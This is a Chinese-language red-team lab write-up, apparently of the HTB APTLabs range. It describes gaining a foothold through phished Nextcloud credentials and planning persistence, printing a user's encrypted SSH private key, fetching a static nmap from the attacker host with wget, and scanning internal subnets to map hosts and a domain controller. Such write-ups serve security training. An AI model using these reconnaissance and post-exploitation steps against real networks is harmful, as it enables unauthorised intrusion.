红队渗透实战笔记：内网立足与信息收集

一、立足点与持久化策略

1. 立足点的重要性

• 通过钓鱼获得next cloud的凭据，成功建立初始立足点

• 第四枚flag位于立足点处，整个靶场共有20个flag

• 初始立足点是渗透的基础，必须确保它的稳定性

2. 持久化的必要性

• 持久化是获得立足点后的首要任务，防止立足点丢失

• 如果管理员发现入侵并修改密码或加固系统，立足点就会丢失

• 持久化策略包括：创建新用户、部署后门、利用系统漏洞等

3. 系统枚举与安全意识

• 进入系统后需要谨慎行事，注意是否有防御系统监控

• 需要检查系统更新情况和安全状态

• 发现系统有36个未应用的更新，其中31个是安全更新

• 系统显示"机器名：next cloud"，表明这台机器是用于next cloud应用的

4. 隐藏文件与密钥分析

• 发现重要的隐藏文件：.bash_history和SSH密钥

• 在用户目录下发现了RSA格式的公钥和私钥文件

• 私钥是加密的，需要密码才能使用

• 密钥仅作存储用途，并不是在标准的.ssh目录下

# 查看隐藏文件
ls -la
sshuser@nextcloud:~$ ls -al
total 40
drwxr-xr-x 6 sshuser sshuser 4096 Jul 18  2024 .
drwxr-xr-x 3 root    root    4096 Sep 17  2020 ..
lrwxrwxrwx 1 root    root       9 Apr 17  2020 .bash_history -> /dev/null
-rw-r--r-- 1 sshuser sshuser  220 Feb 23  2020 .bash_logout
-rw-r--r-- 1 sshuser sshuser 3771 Feb 23  2020 .bashrc
drwx------ 2 sshuser sshuser 4096 Feb 23  2020 .cache
-rw-rw-r-- 1 sshuser sshuser   30 Sep  7  2020 flag.txt
drwx------ 3 sshuser sshuser 4096 Feb 23  2020 .gnupg
drwxrwxr-x 3 sshuser sshuser 4096 Sep  7  2020 .local
-rw-r--r-- 1 sshuser sshuser  807 Feb 23  2020 .profile
drwx------ 2 sshuser sshuser 4096 Feb 23  2020 .ssh
sshuser@nextcloud:~$ 

# 查看SSH密钥
cat .ssh/id_rsa
cat .ssh/id_rsa.pub

sshuser@nextcloud:~$ cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C373000CFD54B3F4508922250C171ED4

mGPS7QR4zX5++D5HVla7VzvT4cUtMFDV/jWdnL6sGI9ne5Ft7CqqJGKayJrCD115
8AYLM3JZqtKBHDhffntvlYeErQCS5QiGAUwPEw6FpfA1rYBm6yMMYkUxOh1FOcGD
vNm91sOA6xlN1uqN1lEU97rgMTZW3cuuAk1mL+VyJ+cH8KmCVxhnDIJ+YIUbMI13
UN/dY0B3x7tljsLPmOzJqEShXwTPqwW9Iebg5jdPMCRz/XUf3Jsm4NQ924+EC8K/
nmsFou94k7ofL4nMLVvf3ZZQv6xTNR4W6zPiCpwASX+r36zJgxPfUyvQUYPAX9Xf
pRWlj9nTQ8ui7aKnLnDpMX826uvHuYyWILIpp2LNMjMoBAqy3tqgBWbyXH2zeBff
6m8ShHyAAXRzJBE+CKiBGPUamINsUVnYZCFco33NkW0XLrFN83/pYoYsm+sQsOgt
zcaH8EcO6uUCtpVLCdr/nWw9mZG+FwtWIe9CtZmP1MT+DO5Wpkes6T90k67W18yz
wqE0JWNcTv2tJZAtEN2pBZkcMAorLuZuyQieQ4y2WM5I1d8wpK3aGleMStrUvWer
oXMWlL4eQK9E/apzs0wdDNf6ZCKIRSiQ75r1mydj3DTbQCywH+4TUcRLTo4XMlwo
A9fNZtliPNrY0RUgJOq4Id4O/RKkysp3JrSLH8rC8sUFWXXajZxC43t5ky1uF8vo
ML7NJI3bymEEaG58rvUlfcBoGcjjJKw+NKuv6CPQkqP69LPNtjoJxOczrPCvzDJj
2mZpForsr1wMMbjjzNur0txBRUHEsoYiRwM/2Fwjbvij4szGOEvV3ensGc2hrDzz
SfwnqBJ2/7O5jB3CVa8jk1klDjWdi9P3yG1IvJytQzMSg/m7GV0j3oYQt253AqSL
qSazpfpL5qjtI20sylLyc8T1B/Fs97qqSgxE6I3pS5Jp59BmW95P1bZqq+lfBZB+
odTNyB7uSW+bCnLmChKKYoVb0ZbhnYUmoHxvKuXM4gWWsIjbLvmD8ZhZuQiDbRD/
5sJfltEAntIShDzJ76SSpk6J9mzK21sngaGRJZuIWaDjnBM0zjoqc0MiTXoxFlwI
uq/2Jre8oSY+qD9xP2+uaGDKCMFxjcG+bm626W5KPyOPUIyn/DfpoC4DgDPlzncU
/tKHaxTxcIsrZ+Vfn+D9IixHovJc21kvSTYpN7U7h3CCLRd3GWOkeO1hw+PPZrLF
bANQ9qSJbvBW9+KlaKxZAnAlIUZqHG29EJABE2HwxWw+RUy3h32LrP3TyYzLikL2
xnqgEAKq9y6AUarxKObRNWu/ytb9IO4LzeXEtFGwxcSZZ6sFShVJ79TzwA7fH5Ei
vgNNtyOHtmH6wEvRz9bKpis9MHDeKjOCvHF7HqqIGw4CwZ4N8Y+N4zwHu3X2EPP/
0E15Y+yBjNSpdV21M5lLtv9jqCTF8UoGZGqhyLN+E0zpNu1ZDLV7PA13S55OHr9d
6zTf5H5dzCH42HUccp/1Krj0t0KqFKeEzy5WmvHFP2hpP+jlNjz7rWJVdh7lCi/f
IeMfaTX5FRkY0MPLRmbS87s7WRuPMkJtmoqeJXNj91k2LqL8UPcA9cJeqkfCyy/M
-----END RSA PRIVATE KEY-----

sshuser@nextcloud:~$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCVM2fM6ou5UOJL0k5J/wF+QTU/y9eR0I79Hfl0841XLe20MTm/ySzyDAjYrJopzppSRVNu7YKldWBM/apGGdrWm1cRBtX94wBSyr4LGgeTiwv8Chj9ifHaqvthDuWdlTHFy1qMrH5CvJBqTmDP/9soV6hUl89n4Ksj8qM+K5Yb6lVdqXa/VtGl58H5xEx8XRhRJvCh8VAblf3UNHHiKDtcpuv2xGGnRATcqlLtb+P5NJxPv6ezGkYdoxZPHzwD3Gch94Wlve+15k3t2EKvFVVt4Ofxsqu9Ku4+BBTkPqDs2Y6/NgY+IGtPOpNHCNUpd8g8SaZ4TutbyCXXd1ESe78X sshuser@nextcloud

二、内网枚举与拓扑探索

1. 网络信息收集

• 通过ifconfig或ip a命令查看网卡配置

• 发现主要网段：192.168.20.31（C类网段）

• 发现docker容器网段：172.17.0.1（B类网段）

• 发现与外网10.10.x.x对应的内网IP分配规律
  
  
  
  
  可以立即应用36个更新。

  其中31个更新是标准安全更新。

  要查看这些附加更新，请运行：apt-list--upgradable
  
  这里再结合HTB上的更改记录可以了解到
  
  
  
  
  
  
  

# 查看网络配置
ip a
ifconfig

2. 工具准备与静态二进制文件

你可以在以下几个网站或工具库中查找静态编译的独立二进制程序（static binaries），类似于 soar 这种工具提供的静态编译软件包：

1. Static Binaries 相关资源

---

2. 包管理工具（带静态编译支持）

有些包管理器本身支持下载静态编译的二进制文件：

---

3. 直接下载静态编译的工具

一些常见工具的静态编译版本可以直接下载：

---

如果你经常需要静态编译的工具，建议使用 soar、nix 或 musl.cc 来获取所需的二进制文件，或者直接从 GitHub 找一些专门提供静态编译版本的项目。你可以具体告诉我你想找哪些工具，我可以帮你查找静态编译版本的下载地址。

先查看kali本机的nmap

• 由于权限限制，无法直接安装nmap等扫描工具

• 需要寻找静态编译的二进制文件，解决依赖问题
  
  查找本地的nmap
  
  
  
  
  
  这里我们需要的是一个独立的nmap可执行文件，也就是standalone
  
  独立的可以执行文件

  独立的文件就是把它的依赖全打包打到一起了，一个ELF文件就这么一个东西，
  但是事实上告诉你，这里就没有这个东西。
  
  
  
  查找依赖

  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# file /usr/lib/nmap/nmap 
  /usr/lib/nmap/nmap: ELF 64-bit LSB pie executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5069dad954210da431a93f6279154b3b7a3ffbcf, for GNU/Linux 3.2.0, stripped
  
  ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
  └─# ldd /usr/lib/nmap/nmap 
          linux-vdso.so.1 (0x00007ff35c924000)
          libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007ff35c562000)
          libpcap.so.0.8 => /lib/x86_64-linux-gnu/libpcap.so.0.8 (0x00007ff35c514000)
          libssh2.so.1 => /lib/x86_64-linux-gnu/libssh2.so.1 (0x00007ff35c4cc000)
          libssl.so.3 => /lib/x86_64-linux-gnu/libssl.so.3 (0x00007ff35c3c9000)
          libcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3 (0x00007ff35be00000)
          libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007ff35c3a9000)
          liblinear.so.4 => /lib/x86_64-linux-gnu/liblinear.so.4 (0x00007ff35c8f2000)
          liblua5.4.so.0 => /lib/x86_64-linux-gnu/liblua5.4.so.0 (0x00007ff35bdbd000)
          libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007ff35ba00000)
          libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007ff35bcd7000)
          libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007ff35bcaa000)
          libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff35b80a000)
          /lib64/ld-linux-x86-64.so.2 (0x00007ff35c926000)
          libdbus-1.so.3 => /lib/x86_64-linux-gnu/libdbus-1.so.3 (0x00007ff35b7b3000)
          libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007ff35b6eb000)
          libblas.so.3 => /lib/x86_64-linux-gnu/libblas.so.3 (0x00007ff35b676000)
          libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007ff35b58d000)
          libcap.so.2 => /lib/x86_64-linux-gnu/libcap.so.2 (0x00007ff35c39d000)
  

  
  
  在这个场景下映射出来一个东西就是你一定要有各种工具的编译能力。如果你没有这些编译能力，那这个东西是没法使用的。

  这里有个专业词汇上的注意点，
  就是standalone和static binary的区别
  standalone
  static binary

• 使用two-packs项目获取预编译的静态二进制文件

  # 下载静态编译的nmap
  wget http://10.10.16.122/nmap
  
  # 验证文件类型
  file nmap
  
  # 赋予执行权限
  chmod +x nmap
  
  # 检查是否为静态二进制
  ldd nmap

3. soar

• 项目地址：https://github.com/pkgforge/soar
  Soar 是一个快速、现代的静态二进制文件、可移植格式的包管理器，它就可以正常工作
  在任何基于 *Unix 的发行版上支持静态二进制文件、AppImages 和其他可移植格式
  
  官房文档：https://soar.qaidvoid.dev
  
  下载链接：https://github.com/pkgforge/soar/releases/download/v0.5.13/soar-x86_64-linux

  特征	描述
  通用包格式支持	Soar 可以安装和管理可移植的包格式，包括静态二进制文件、自解压存档和 AppImages。
  系统集成	Soar 会自动将已安装的软件包与您的系统集成，以提供类似本机的体验。
  灵活的存储库系统	虽然 Soar 预先配置了官方存储库，但您可以配置使用任何构建格式的自定义存储库，只要它们提供兼容的元数据即可。的 .SBUILD 格式仅适用于官方存储库，而不需要自定义存储库。
  安全第一	Soar 通过软件包安装的校验和和签名验证来实施安全性。
  外部存储库支持	Soar 可以通过 pkgforge 提供的元数据访问 ivan-hc/AM 和 appimage.github.io 等来源的软件包。这些外部源不直接与 Soar 一起使用，但通过 pkgforge 的元数据转换实现兼容。注意：来自外部存储库的包不会经过验证。
  快速的包裹作	Soar 以最小的开销提供高效的软件包搜索、安装和管理。

  
  
  
  
  
  
  

---

1. sharun.wrappe

nmap#sharun.wrappe.alpine.nmap-7.95:pkgcache

• 这是 源包 或者是标准 pkgcache 格式的 二进制包。

• 可能是经过简单打包的 nmap 可执行文件，依赖环境可能是 alpine（通常非常轻量，但会有动态库依赖）。

• 可能依赖共享库，所以传到没有相关依赖的机器，执行会出错（如 libpcap、libssl 不匹配或缺失）。

• 42MB大小

---

2. runimage

nmap#runimage.alpine.nmap-7.95:pkgcache

• 这个是 runimage，通常是一个可直接运行的 完整环境封装。

• 可以理解为一个“沙箱”或“镜像”，能让你不装依赖直接跑。
  类似容器镜像（chroot、小型 sandbox），但还是需要 soar 或 runimage 支持。

• 42MB大小
  

3. 下载完后查看该nmap

关键点：

• static-pie linked
  ➜ 静态编译 + Position Independent Executable（位置无关，适合各种环境）
  ➜ 不依赖共享动态库，非常适合你上传到权限有限、无外网的内网机器使用！

  stripped
  ➜ 去掉调试符号，体积更小，执行速度快。

  x86-64
  ➜ 64 位架构的内网机器可以直接运行！
  
  

  4. 使用goshs开启web服务
  

  可以使用python3 -m http.server 9000
  
  也可以用新的
  goshs -i 10.10.16.111 -p 9000
  
  
  

  5. 靶机上运行
  
  

  6. 测试另一个
  
  
  
  
  

  最终结果是这俩都可以运行
  完美~

  7. 测试最后一个版本

  轻量版4.5MB大小

  ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
  └─# ./soar-x86_64-linux search nmap                                     
  [-] asnmap#github.com.projectdiscovery.asnmap:bincache (static-HEAD-9eed841-240627T081816:1.1.1) - Tool to gather network ranges using ASN information (30.21 MiB)
  [-] nmap-formatter#github.com.vdjagilev.nmap-formatter:bincache (static-HEAD-ffa7b32-250208T022930:3.0.2) - A tool to convert NMAP results to html, csv, json, markdown, graphviz (dot) or sqlite (31.28 MiB)
  [-] nmapurls#github.com.sdcampbell.nmapurls:bincache (static-HEAD-cc2fb73-240213T060214) - parses Nmap xml reports and outputs a list of http(s) URLs (2.21 MiB)
  [-] ncat#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Concatenate and redirect sockets [nmap] (2.93 MiB)
  [-] nmap#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Network exploration tool and security/port scanner [nmap] (4.50 MiB)
  [-] nping#sharun.wrappe.alpine.nmap:pkgcache (archive-7.95) - Network packet generation tool/ping utility [nmap] (3.73 MiB)
  [-] nmap#runimage.alpine.nmap:pkgcache (runimage-7.95) - Network exploration tool and security/port scanner (42.61 MiB)
  Showing 7 of 7
                                                                                                                                             
  ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
  └─# ./soar-x86_64-linux download nmap#sharun.wrappe.alpine.nmap:pkgcache
  Downloading package: nmap#sharun.wrappe.alpine.nmap
   [━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━] 1.26 MiB/s     4.32 MiB/4.32 MiB                                                                                                                                                
  ┌──(root㉿kali)-[~/Desktop/APTLabs/soar]
  └─# ls -liah                                          
  总计 12M
  3147099 drwxr-xr-x  2 root root 4.0K  3月22日 06:03 .
  3146321 drwxr-xr-x 13 root root 4.0K  3月20日 03:44 ..
  3146681 -rwxr-xr-x  1 root root 4.4M  3月22日 06:03 nmap
  3147137 -rwxr-xr-x  1 root root 7.6M  3月10日 12:37 soar-x86_64-linux
  

  
  
  

4. 网络扫描策略

• 使用多种扫描方式确保不遗漏任何主机
  
  
  

• 由于 mass_dns 无法从 /etc/resolv.conf 获取 DNS 服务器信息，它不知道向哪些服务器发送 DNS 查询请求。

• 因此，它无法执行任何 DNS 解析，包括反向 DNS 查找（将 IP 地址解析为主机名）。

• 程序提示你可以尝试使用 --system-dns 选项（尝试用其他方式获取系统 DNS 设置）或者使用 --dns-servers 选项手动指定 DNS 服务器。

• --system-dns
  --system-dns参数的意思是强制使用系统的DNS
  
  使用 --system-dns 选项（如果支持）： 尝试运行 mass_dns 时加上 --system-dns 参数。
  这可能会让 mass_dns 尝试通过其他系统调用或机制来查找 DNS 服务器。

  sshuser@nextcloud:~/nmap$ ./nmap -sn 192.168.20.0/24
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 04:19 UTC
  mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers: No such file or directory (2)
  mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  Nmap scan report for 192.168.20.1
  Host is up (0.00043s latency).
  Nmap scan report for 192.168.20.15
  Host is up (0.0012s latency).
  Nmap scan report for 192.168.20.31
  Host is up (0.00084s latency).
  Nmap done: 256 IP addresses (3 hosts up) scanned in 3.01 seconds

  加上--system-dns 选项

  sshuser@nextcloud:~/nmap$ ./nmap -sn 192.168.20.0/24 --system-dns
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 04:22 UTC                                                                            
  Nmap scan report for 192.168.20.1
  Host is up (0.00055s latency).
  Nmap scan report for 192.168.20.15
  Host is up (0.00056s latency).
  Nmap scan report for 192.168.20.31
  Host is up (0.00012s latency).
  Nmap done: 256 IP addresses (3 hosts up) scanned in 17.63 seconds
  

• 发现的网段：192.168.20.x, 192.168.21.x, 192.168.5.x, 172.17.0.x
  
  

  sshuser@nextcloud:~/saomiao$ arp                                                                                                          
  Address                  HWtype  HWaddress           Flags Mask            Iface                                                          
  172.17.0.4               ether   02:42:ac:11:00:04   C                     docker0                                                        
  192.168.20.10            ether   00:50:56:b0:ea:cd   C                     ens160                                                         
  192.168.20.1             ether   00:50:56:b0:d5:e6   C                     ens160                                                         
  172.17.0.3               ether   02:42:ac:11:00:03   C                     docker0                                                        
  192.168.20.15            ether   00:50:56:b0:9d:a4   C                     ens160                                                         
  172.17.0.2               ether   02:42:ac:11:00:02   C                     docker0                                                        
  172.17.0.5               ether   02:42:ac:11:00:05   C                     docker0 

  
  
  
  
  
  
  B类网段 /16
  
  ./nmap -sn 192.168.0.0/16 --system-dns
  

  sshuser@nextcloud:~/saomiao$ ./nmap -sn 192.168.0.0/16 --system-dns
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 15:14 UTC
  Nmap scan report for 192.168.5.13
  Host is up (0.00051s latency).
  Nmap scan report for 192.168.5.21
  Host is up (0.0019s latency).
  Nmap scan report for 192.168.5.62
  Host is up (0.00044s latency).
  Nmap scan report for 192.168.5.74
  Host is up (0.00077s latency).
  Nmap scan report for 192.168.5.88
  Host is up (0.00085s latency).
  Nmap scan report for 192.168.5.231
  Host is up (0.00034s latency).
  Nmap scan report for 192.168.5.242
  上面是一类地址
  
  
  下面是一类地址
  Host is up (0.0019s latency).
  Nmap scan report for 192.168.20.1
  Host is up (0.00041s latency).
  Nmap scan report for 192.168.20.15
  Host is up (0.0011s latency).
  Nmap scan report for 192.168.20.31
  Host is up (0.00085s latency).
  Nmap scan report for 192.168.21.123
  Host is up (0.0018s latency).
  

  sshuser@nextcloud:~/saomiao$ ./nmap -sn 172.17.0.0/16 --system-dns
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 15:59 UTC                                                                           
  Nmap scan report for 172.17.0.1                                                                                                           
  Host is up (0.00037s latency).                                                                                                            
  Nmap scan report for 172.17.0.2                                                                                                           
  Host is up (0.00030s latency).                                                                                                            
  Nmap scan report for 172.17.0.3                                                                                                           
  Host is up (0.00035s latency).                                                                                                            
  Nmap scan report for 172.17.0.4                                                                                                           
  Host is up (0.00040s latency).                                                                                                            
  Nmap scan report for 172.17.0.5                                                                                                           
  Host is up (0.00076s latency).

  
  

• 使用ARP缓存发现未响应ping的主机（特别是DC）
  
  

• 对内网扫描比对外网扫描更安全，产生的流量不易被检测
  

  # 基本扫描
  ./nmap -sn 192.168.20.0/24 --system-dns=192.168.20.10
  
  # 完整端口扫描
  ./nmap -p- 192.168.20.31,15,10 --system-dns=192.168.20.10
  
  # 检查ARP缓存
  arp -a

5. 网络拓扑分析

• 发现4台主要内网机器：192.168.20.10(DC), 192.168.20.15, 192.168.20.31, 192.168.21.123
  

  Cubano.local DC.Cubano.local 192.168.23.10
  
  
  
  
  
  

  sshuser@nextcloud:~/saomiao$ ./nmap -sT -sC -sV -O 192.168.20.1,15,31 --system-dns
  OS scan requested but I cannot find nmap-os-db file.                                                                                      
  QUITTING!
  
  -O 操作系统识别需要 root 权限
  
  sshuser@nextcloud:~/saomiao$ ./nmap -sT 192.168.20.1,15,31 --system-dns                                                        
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:05 UTC                                                                           
  Unable to find nmap-services!  Resorting to /etc/services                                                                                 
  Unable to find nmap-protocols!  Resorting to /etc/protocols
  ==================================================================
  Unable to find nmap-services! 和 nmap-protocols!
  这两个提示说明你的 nmap 没有找到自带的服务和协议数据库文件：
  
  nmap-services：定义了端口号与服务名的映射（比如 80 -> http）
  nmap-protocols：协议名称与编号的映射（比如 TCP 是 6）
  ==================================================================
  Nmap scan report for 192.168.20.1                                                                                                         
  Host is up (0.00056s latency).                                                                                                            
  Not shown: 1153 filtered tcp ports (no-response)                                                                                          
  PORT   STATE SERVICE                                                                                                                      
  22/tcp open  ssh                                                                                                                          
  53/tcp open  domain                                                                                                                       
  80/tcp open  http                                                                                                                         
                                                                                                                                            
  Nmap scan report for 192.168.20.15                                                                                                        
  Host is up (0.00066s latency).                                                                                                            
  Not shown: 1154 filtered tcp ports (no-response)                                                                                          
  PORT    STATE SERVICE                                                                                                                     
  80/tcp  open  http                                                                                                                        
  443/tcp open  https                                                                                                                       
                                                                                                                                            
  Nmap scan report for 192.168.20.31                                                                                                        
  Host is up (0.00024s latency).                                                                                                            
  Not shown: 1151 closed tcp ports (conn-refused)                                                                                           
  PORT     STATE SERVICE                                                                                                                    
  22/tcp   open  ssh                                                                                                                        
  25/tcp   open  smtp                                                                                                                       
  53/tcp   open  domain
  443/tcp  open  https
  8080/tcp open  http-alt
  
  Nmap done: 3 IP addresses (3 hosts up) scanned in 22.24 seconds
  sshuser@nextcloud:~/saomiao$ 
  

• 发现与外网对应的内网IP结构：外网10.10.x.x对应内网192.168.5.x

• 特别关注192.168.20.10主机，通过主机名和开放端口确认是域控制器(DC)
  

  sshuser@nextcloud:~/saomiao$ ./nmap 192.168.20.10 --system-dns
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:10 UTC
  Unable to find nmap-services!  Resorting to /etc/services
  Unable to find nmap-protocols!  Resorting to /etc/protocols
  
  Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  Note: Host seems down
  这个说明 Nmap ping 不通目标主机（192.168.20.10）。
  主机防火墙屏蔽了 ICMP Echo 请求（ping 包）
  -Pn：不 ping，直接扫描
  
  Nmap done: 1 IP address (0 hosts up) scanned in 3.01 seconds
  sshuser@nextcloud:~/saomiao$ 
  
  
  sshuser@nextcloud:~/saomiao$ ./nmap 192.168.20.10 --system-dns -Pn
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 16:10 UTC
  Unable to find nmap-services!  Resorting to /etc/services
  Unable to find nmap-protocols!  Resorting to /etc/protocols
  Nmap scan report for 192.168.20.10
  Host is up (0.00051s latency).
  Not shown: 1147 filtered tcp ports (no-response)
  PORT    STATE SERVICE
  53/tcp  open  domain
  88/tcp  open  kerberos
  135/tcp open  epmap
  139/tcp open  netbios-ssn
  389/tcp open  ldap
  445/tcp open  microsoft-ds
  464/tcp open  kpasswd
  593/tcp open  unknown
  636/tcp open  ldaps
  
  Nmap done: 1 IP address (1 host up) scanned in 10.02 seconds
  sshuser@nextcloud:~/saomiao$ 
  

  
  
  
  

• 构建内网拓扑图，理解网络架构
  

6. 服务识别与分析

• 主机192.168.20.10(DC)开放了典型的域控端口：53(DNS), 88(Kerberos), 389(LDAP)等

• 主机192.168.20.15开放了80和443端口，可能是web服务器

• 主机192.168.21.123开放了443端口，运行Manage Engine Service Desk Plus服务

• 主机172.17.0.x开放了多个端口，与外网服务对应

# 服务扫描
./nmap -sV 192.168.20.31 --system-dns=192.168.20.10

7. 最后再扫描一遍，不留遗漏

• 还是待使用这个43M版本的Nmap，不会出那么多报错问题
  

  
  
  

  └─# cat 10.10.110.74-host-discovery
  192.168.5.13
  192.168.5.21
  192.168.5.62
  192.168.5.74
  192.168.5.88
  192.168.5.231
  192.168.5.242
  192.168.20.1
  192.168.20.15
  192.168.20.31
  192.168.21.123
  192.168.20.10
  172.17.0.1
  172.17.0.2
  172.17.0.3
  172.17.0.4
  172.17.0.5
  172.17.0.6

  sshuser@nextcloud:~/saomiao$ ./nmap -sT -sV -sC -p- -iL host-discovery --system-dns -Pn
  Ignoring invalid max threads value 4294967295 > max (100000).
  Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-07 18:10 UTC
  Nmap scan report for 192.168.5.13
  Host is up (0.00091s latency).
  Not shown: 65532 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
  | ssh-hostkey: 
  |_  256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519)
  53/tcp open  domain  (generic dns response: NOTIMP)
  80/tcp open  http?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F4166C%P=x86_64-alpine-linux-musl%r(
  SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
  
  Nmap scan report for 192.168.5.21
  Host is up (0.00067s latency).
  Not shown: 65532 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
  | ssh-hostkey: 
  |_  256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519)
  53/tcp open  domain  (generic dns response: NOTIMP)
  80/tcp open  http?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F41667%P=x86_64-alpine-linux-musl%r(
  SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
  
  Nmap scan report for 192.168.5.62
  Host is up (0.00062s latency).
  Not shown: 65532 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
  53/tcp open  domain  (generic dns response: NOTIMP)
  80/tcp open  http?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F41667%P=x86_64-alpine-linux-musl%r(
  SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
  
  Nmap scan report for 192.168.5.74
  Host is up (0.00058s latency).
  Not shown: 65532 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
  53/tcp open  domain  (generic dns response: NOTIMP)
  80/tcp open  http?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port53-TCP:V=7.95%I=7%D=4/7%Time=67F4166C%P=x86_64-alpine-linux-musl%r(
  SF:DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
  
  WARNING: Service 192.168.20.31:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
  WARNING: Service 172.17.0.1:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
  WARNING: Service 172.17.0.3:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
  Nmap scan report for 192.168.5.88
  Host is up (0.00061s latency).
  Not shown: 65534 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  53/tcp open  domain  Unbound
  
  Nmap scan report for 192.168.5.231
  Host is up (0.00082s latency).
  Not shown: 65534 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  53/tcp open  domain  Unbound
  
  Nmap scan report for 192.168.5.242
  Host is up (0.00065s latency).
  Not shown: 65534 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  53/tcp open  domain  Unbound
  
  Nmap scan report for 192.168.20.1
  Host is up (0.00062s latency).
  Not shown: 65534 filtered tcp ports (no-response)
  PORT   STATE SERVICE VERSION
  53/tcp open  domain  Unbound
  
  Nmap scan report for 192.168.20.15
  Host is up (0.00072s latency).
  Not shown: 65531 filtered tcp ports (no-response)
  PORT      STATE SERVICE VERSION
  80/tcp    open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-title: Not Found
  |_http-server-header: Microsoft-HTTPAPI/2.0
  443/tcp   open  https?
  5985/tcp  open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  49443/tcp open  unknown
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  
  Nmap scan report for 192.168.20.31
  Host is up (0.00014s latency).
  Not shown: 65527 closed tcp ports (conn-refused)
  PORT     STATE SERVICE    VERSION
  22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA)
  |_  256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519)
  25/tcp   open  smtp       Postfix smtpd
  |_smtp-commands: nextcloud, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
  53/tcp   open  domain     PowerDNS Authoritative Server 4.1.11
  | dns-nsid: 
  |   NSID: powergslb (706f77657267736c62)
  |   id.server: powergslb
  |_  bind.version: PowerDNS Authoritative Server 4.1.11
  443/tcp  open  ssl/http   Apache httpd 2.4.52 ((Ubuntu))
  |_http-server-header: Apache/2.4.52 (Ubuntu)
  | tls-alpn: 
  |_  http/1.1
  |_http-title: Promote Business Category Bootstrap Responsive Web Template | ...
  |_ssl-date: TLS randomness does not represent time
